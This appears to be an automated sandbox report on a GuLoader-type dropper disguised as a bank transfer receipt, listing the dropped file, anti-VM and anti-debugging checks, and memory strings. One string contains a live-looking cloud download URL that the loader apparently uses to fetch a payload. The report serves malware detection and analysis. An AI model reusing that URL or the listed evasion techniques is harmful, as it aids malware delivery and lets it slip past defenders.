Code function: 0_2_00F34E80 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Command line argument: Kernel32.dll

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source:	Binary string: wntdll.pdbUGP source: nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: nongrav.exe, nongrav.exe, 0000000F.00000002.790554216.000000001EBBF000.00000040.00000001.sdmp, nongrav.exe, 0000000F.00000002.790351865.000000001EAA0000.00000040.00000001.sdmp, svchost.exe, svchost.exe, 00000016.00000002.821268694.0000000003A00000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.788029496.0000000003800000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.821623661.0000000003B1F000.00000040.00000001.sdmp, svchost.exe, 00000016.00000003.786512054.0000000003600000.00000004.00000001.sdmp
Source:	Binary string: wextract.pdbPp source: Bank_Transfer_Receipt_Copy_Scan#342 (5).exe
Source:	Binary string: svchost.pdb source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp
Source:	Binary string: svchost.pdbUGP source: nongrav.exe, 0000000F.00000002.786712436.0000000000110000.00000040.00020000.sdmp, nongrav.exe, 0000000F.00000003.785460105.0000000000756000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Unpacked PE file: 15.2.nongrav.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000001.00000002.507414765.000000000067A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.507792110.0000000002AA0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe	Code function: 0_2_00F378A1 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_00405A42 pushad ; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_00407418 push esp; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA00C5 push 0000001Ch; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA306C pushfd ; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA0043 push 0000001Ch; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA23A8 pushfd ; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA3993 push ebp; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA3397 push eax; retf FA42h
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA1339 push cs; retf
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB1D0D1 push ecx; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_00527C89 push es; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_1_00405A42 pushad ; iretd
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_1_00407418 push esp; ret
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_1_004015E0 push 0051A000h; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_03A7D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3B87C push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3B812 push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3B81B push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3514C push eax; iretd
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D34E06 push EEE5C1DBh; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D3B7C5 push eax; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D35F04 push ecx; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D2CCA8 push edi; ret
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 22_2_02D34405 pushfd ; retf

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Source: initial sample

Static PE information: section name: .text entropy: 7.15232961918

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Jump to dropped file

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F31910 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1PQ36FQ9YGHZAM_FHR1D0IRFRVEBW3FSZ
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEOWS

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D28604 second address: 0000000002D2860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe	RDTSC instruction interceptor: First address: 0000000002D2898E second address: 0000000002D28994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe TID: 6996

Thread sleep count: 581 > 30

Source: C:\Windows\SysWOW64\svchost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Code function: 15_2_004088C0 rdtsc

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Window / User API: threadDelayed 581

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F3532F GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F321E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

System information queried: ModuleInformation

Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=
Source: nongrav.exe, 00000001.00000002.507462728.00000000006DC000.00000004.00000020.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exeows
Source: explorer.exe, 00000015.00000000.735601007.000000000EEA7000.00000004.00000001.sdmp	Binary or memory string: Prod_VMware_SATA
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: vmicshutdown
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: explorer.exe, 00000015.00000000.733926654.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: vmicvss
Source: explorer.exe, 00000015.00000000.729770363.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: nongrav.exe, 00000001.00000002.507816361.0000000002AF0000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787076443.00000000028E0000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: nongrav.exe, 00000001.00000002.507837199.0000000002BBA000.00000004.00000001.sdmp, nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: explorer.exe, 00000015.00000000.733803262.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: nongrav.exe, 0000000F.00000002.787120391.0000000002A5A000.00000004.00000001.sdmp	Binary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\Bank_Transfer_Receipt_Copy_Scan#342 (5).exe

Code function: 0_2_00F32DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Code function: 15_2_004088C0 rdtsc

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AA8E06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAB126 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAC112 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 1_2_02AAAB56 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB446A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB90EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFD294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB08EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB04A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB04A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB54257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB95BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h]
